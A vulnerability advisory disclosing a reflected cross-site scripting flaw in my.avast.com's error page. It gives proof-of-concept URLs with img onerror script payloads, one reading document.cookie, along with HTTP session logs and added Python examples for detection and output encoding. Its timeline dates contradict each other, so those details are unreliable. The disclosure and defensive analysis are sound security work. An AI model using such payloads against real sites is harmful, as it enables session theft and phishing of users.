Document Title:
===============
AVAST (My) #15 - (frontend.exception) CS XSS Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1625
Release Date:
=============
2016-04-18
Vulnerability Laboratory ID (VL-ID):
====================================
1625
Common Vulnerability Scoring System:
====================================
3.3
Product & Service Introduction:
===============================
Avast security software products are developed for Microsoft Windows, Mac OS X, Android and Linux users by AVAST
Software s.r.o., a Czech private limited company. Avast was founded in 1988, and is headquartered in Prague, Czech Republic.
It produces antivirus and security programs for personal and commercial use. In January 2015, Avast had 21.4% of the worldwide
security vendor market share. As of March 2015, Avast had 233 million users of its products and services worldwide. According
to a company press release, Avast protects more than 30 percent of the consumer PCs in the world outside of China. The software
products have a user interface available in 45 languages. Avast has 500 employees; 90 percent of whom work in the Czech Republic.
Avast has 13 offices in Prague, Brno, Germany, China, South Korea, Taiwan & U.S.
(Copy of the Homepage: https://en.wikipedia.org/wiki/Avast_%28software_company%29 )
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a client-side vulnerability in the Avast Business online service web-application.
Vulnerability Disclosure Timeline:
==================================
2015-10-27: Researcher Notification & Coordination (Kieran Claessens)
2015-10-27: Vendor Notification (AVAST Security Team)
2015-11-02: Vendor Response/Feedback (AVAST Security Team)
2015-04-12: Vendor Fix/Patch (AVAST Developer Team)
2015-04-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
AVAST!
Product: My.Avast - Online Service (Web-Application) 2015 Q4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Low
Technical Details & Description:
================================
A client-side cross site scripting web vulnerability has been discovered in the official Avast My online service web-application.
The client-side vulnerability allows remote attackers to inject script code that compromises client-side browser-to-application requests.
The vulnerability is located in the `error` value of the frontend.exception module of the my.avast online-service web-application. Remote attackers are
able to inject script code to manipulate client-side GET method requests to the my.avast.com website. The injection point is the error value of the
exception and the execution of the injected script code occurs in the error message context. The attack vector of the vulnerability is client-side and
the request method to inject or execute is GET.
The security risk of the client-side cross site web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.3.
Exploitation of the client-side cross site scripting web vulnerability requires no privileged web-application user account and low or medium user interaction.
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent loading of
malicious script code or client-side manipulation of affected or connected modules.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Avast - My
Vulnerable Parameter(s):
[+] error
Affected Module(s):
[+] frontend.exception - Exception Handling (Registration)
Proof of Concept (PoC):
=======================
The client-side cross site scripting vulnerability can be exploited by remote attackers without a privileged web-application user account and with low or medium user interaction.
For security demonstration or to reproduce the vulnerability, follow the provided information and steps below.
PoC: Links
https://my.avast.com/en-us/error?error=registration_already_finished"><img src="X" onerror="alert('xss')>"
https://my.avast.com/en-us/error?error="><img src="X" onerror="alert('xss')>" //this gives a more detailed error.
PoC: Source
<h1>frontend.exception.header.registration_already_finished"><img src="X" onerror="alert('xss')>" <="" h1="">
<p>frontend.exception.desc.registration_already_finished"><img src="X" onerror="alert('xss')>" <="" p="">
<a href="/en-us/" class="button button-inline button-huge button-secondary margin-top-20">Go to My Avast homepage.</a>
</p></h1>
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET https://my.avast.com/en-us/error?error=registration_already_finished%22%3E%3Cimg%20src=%22X%22%20onerror=%22alert(document.cookie)%3E%22[CLIENT-SIDE SCRIPT CODE INJECT!]
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[my.avast.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Cookie[app_params=error%3Dregistration_already_finished%2522%253E%253Cimg%2520src%3D%2522X%2522%2520onerror%3D%2522alert%28document.cookie%29%253E%2522;
locale2=en-ww; _ga=GA1.2.1239098146.1445943331; mySessionId=bl5aNojSS9O8NHKd]
Connection[keep-alive]
If-Modified-Since[Fri, 23 Oct 2015 10:52:20 GMT]
Response Header:
Server[nginx/1.7.6]
Date[Tue, 27 Oct 2015 11:32:30 GMT]
Content-Type[text/html]
Transfer-Encoding[chunked]
Connection[keep-alive]
Set-Cookie[locale2=en-us; Expires=Sun, 14 Nov 2083 14:46:37 GMT; Path=/; Domain=.avast.com; Secure; HTTPOnly
mySessionId=bl5aNojSS9O8NHKd; Expires=Tue, 27 Oct 2015 11:33:30 GMT; Path=/; Domain=.my.avast.com; Secure; HTTPOnly]
Last-Modified[Fri, 23 Oct 2015 10:52:20 GMT]
Cache-Control[max-age=0, private]
Strict-Transport-Security[max-age=31536000]
x-content-type-options[nosniff]
X-XSS-Protection[1; mode=block]
Content-Encoding[gzip]
Status: 200[OK]
GET https://my.avast.com/en-us/X[CLIENT-SIDE SCRIPT CODE VULNERABILITY!]
Load Flags[LOAD_NORMAL] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[my.avast.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://my.avast.com/en-us/error?error=registration_already_finished%22%3E%3Cimg%20src=%22X%22%20onerror=%22alert(document.cookie)%3E%22]
Cookie[app_params=error%3Dregistration_already_finished%2522%253E%253Cimg%2520src%3D%2522X%2522%2520onerror%3D%2522alert%28document.cookie%29%253E%2522;
locale2=en-us; _ga=GA1.2.1239098146.1445943331; mySessionId=bl5aNojSS9O8NHKd]
Connection[keep-alive]
Response Header:
Server[nginx/1.7.6]
Date[Tue, 27 Oct 2015 11:32:30 GMT]
Content-Type[text/html]
Transfer-Encoding[chunked]
Connection[keep-alive]
Set-Cookie[mySessionId=bl5aNojSS9O8NHKd; Expires=Tue, 27 Oct 2015 11:33:30 GMT; Path=/; Domain=.my.avast.com; Secure; HTTPOnly]
Last-Modified[Fri, 23 Oct 2015 10:52:20 GMT]
Cache-Control[max-age=0, private]
Strict-Transport-Security[max-age=31536000]
x-content-type-options[nosniff]
X-XSS-Protection[1; mode=block]
Content-Encoding[gzip]
Reference(s):
https://my.avast.com/
https://my.avast.com/en-us/
https://my.avast.com/en-us/error
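A defender-side check over request lines of the shape shown in the session log above, as an added Python example that is not part of the advisory: it URL-decodes every query parameter (repeatedly, because the app_params cookie in the log shows the same value double-encoded) and flags values that carry tag characters or an inline event-handler attribute. The SAMPLE_LOG lines are constructed for this example; the decode_fully and suspicious_requests names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed request lines modelled on the advisory's "PoC Session Logs" section.
# Line 3 is double-encoded, as the app_params cookie value in the log is.
SAMPLE_LOG = """\
GET https://my.avast.com/en-us/error?error=registration_already_finished
GET https://my.avast.com/en-us/error?error=registration_already_finished%22%3E%3Cimg%20src=%22X%22%20onerror=%22alert(document.cookie)%3E%22
GET https://my.avast.com/en-us/error?error=%2522%253E%253Cimg%2520src%3D%2522X%2522
GET https://my.avast.com/en-us/X
"""

# Angle brackets or an "on<event>=" attribute inside a decoded parameter value are
# the markers a reflected-XSS attempt against an HTML context leaves behind.
TAG_OR_HANDLER = re.compile(r"<|>|\bon\w+\s*=", re.IGNORECASE)


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded to avoid loops)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(log_text: str) -> list[tuple[str, str]]:
    """Return (parameter name, decoded value) for every flagged query parameter."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        url = parts[1]
        # parse_qs already decodes one layer; decode_fully handles the rest.
        params = parse_qs(urlsplit(url).query, keep_blank_values=True)
        for name, values in params.items():
            for raw in values:
                decoded = decode_fully(raw)
                if TAG_OR_HANDLER.search(decoded):
                    hits.append((name, decoded))
    return hits


if __name__ == "__main__":
    for name, value in suspicious_requests(SAMPLE_LOG):
        print(f"flagged parameter {name!r}: {value!r}")
```

The check runs on the decoded value rather than the raw URL so that the single- and double-encoded forms in the log are treated alike; the plain registration_already_finished request and the follow-up fetch of /en-us/X are not flagged.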
Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing and encoding the vulnerable error value in the frontend.exception module.
Restrict the input and disallow special characters to prevent client-side script code injection attacks. Encode the output in the error message
context so that a reflected value cannot execute as client-side script code.
2015-04-12: Vendor Fix/Patch (AVAST Developer Team)
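The rendering defect described in the Technical Details section beside the fix this section recommends, as an added Python example that is not Avast's code: the MESSAGES table, the render_vulnerable/render_fixed functions and the generic fallback text are assumptions that approximate the behaviour the PoC source shows (an unknown error code is echoed back as the raw frontend.exception.header.<error> key).

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed translation table standing in for the frontend.exception messages.
MESSAGES = {
    "registration_already_finished": (
        "Registration already finished",
        "This account has already completed registration.",
    ),
}


def error_from_url(url: str) -> str:
    """Extract the `error` query value the way the error page would receive it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("error", [""])[0]


def render_vulnerable(error: str) -> str:
    """Before: the untrusted value is concatenated into HTML with no encoding,
    and an unknown code is echoed as the raw translation key."""
    header, desc = MESSAGES.get(
        error,
        (f"frontend.exception.header.{error}", f"frontend.exception.desc.{error}"),
    )
    return f"<h1>{header}</h1><p>{desc}</p>"


def render_fixed(error: str) -> str:
    """After: the code is checked against the known set (input restriction) and
    whatever is rendered is HTML-encoded (output encoding). The raw value is
    never reflected, so an attacker controls nothing in the page."""
    if error in MESSAGES:
        header, desc = MESSAGES[error]
    else:
        header, desc = "Error", "An unexpected error occurred."
    return f"<h1>{html.escape(header)}</h1><p>{html.escape(desc)}</p>"


if __name__ == "__main__":
    # Constructed URL in the shape of the advisory's PoC link (payload shortened).
    poc = ("https://my.avast.com/en-us/error?error=registration_already_finished"
           "%22%3E%3Cimg%20src=%22X%22%20onerror=%22alert(1)%3E%22")
    value = error_from_url(poc)
    print("before:", render_vulnerable(value))
    print("after: ", render_fixed(value))
```

Either measure alone would stop the script from executing; applying both means an unexpected value is neither interpreted as markup nor leaked back to the user as a raw key. Note that the session log shows mySessionId set with the HTTPOnly flag, so a payload reading document.cookie would not expose that cookie, which limits the session-hijacking impact the advisory lists.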
Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability in the my.avast web-application is estimated as medium. (CVSS 3.3)
Credits & Authors:
==================
Kieran Claessens - [http://www.vulnerability-lab.com/show.php?user=Kieran%20Claessens]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: [email protected] - [email protected] - [email protected]
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material contact (admin@ or [email protected]) to get a ask permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™